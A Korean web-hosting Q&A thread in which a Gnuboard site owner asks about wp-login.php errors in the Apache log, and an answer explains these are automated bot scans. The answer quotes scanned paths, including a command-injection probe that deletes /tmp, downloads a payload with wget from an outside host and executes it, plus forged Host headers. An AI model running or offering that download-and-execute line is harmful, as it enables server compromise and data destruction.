[php7:error] [pid 2457] [client 아이피:61642] script '/var/www/html/wp-login.php' not found or unable to stat
당연하게 그누보드 사용중인데, 왜 워드프레스 로그인을 요청하는 걸까요?
계속 에러로그가 떠서 신경쓰이는데, 해결방법을 알고 싶습니다.
환경은 센토스, 아파치, 마리아디비 php7.3 입니다.
답변 2개 / 댓글 1개
채택된 답변
+20 포인트
2년 전
무차별 REQUEST_URI 대입입니다.
Copy
/wp-load.php
/s_e.php
/s_ne.php
/wikindex.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt
/shell?cd+/tmp;rm+-rf+*;wget+heylitimysun.top/jaws;sh+/tmp/jaws
/phpMyAdmin-5.2.0-all-languages
/wp-admin/style.php?sig=rename
/wp1/wp-includes/wlwmanifest.xml
/autodiscover/autodiscover.json?@zdi/Powershell
/boaform/admin/formLogin
...
보통 봇으로 돌리기 때문에 요청 호스트가 도메인이 아닌 IP 인 경우가 많고
요청이 들어오는 헤더의 호스트가 조작되는 케이스도 있습니다.
Copy
127.0.0.1:80
localhost:8080
www.google.com:443
아무 URI 나 호출하다가 하나 얻어걸리고 그 이후 액션이 통과되는 경우
운나쁘면 사이트가 털릴수 있습니다.
로그인 후 평가할 수 있습니다
답변에 대한 댓글 1개
댓글을 작성하려면 로그인이 필요합니다.
스위트알데바란해당파일이 존재하지 않거나 해당파일이 가지는 권한이 없다고 하는 내용입니다.
어떤 그누보드인지는 모르겠으나 사용하는 페이지가 sns로그인이나 다른 로그인을 사용중인 스크립트가 있다면 해당 부분을 주석처리하고 사용해보시는게 좋을것 같아요
로그인 후 평가할 수 있습니다
댓글을 작성하려면 로그인이 필요합니다.
답변을 작성하려면 로그인이 필요합니다.
로그인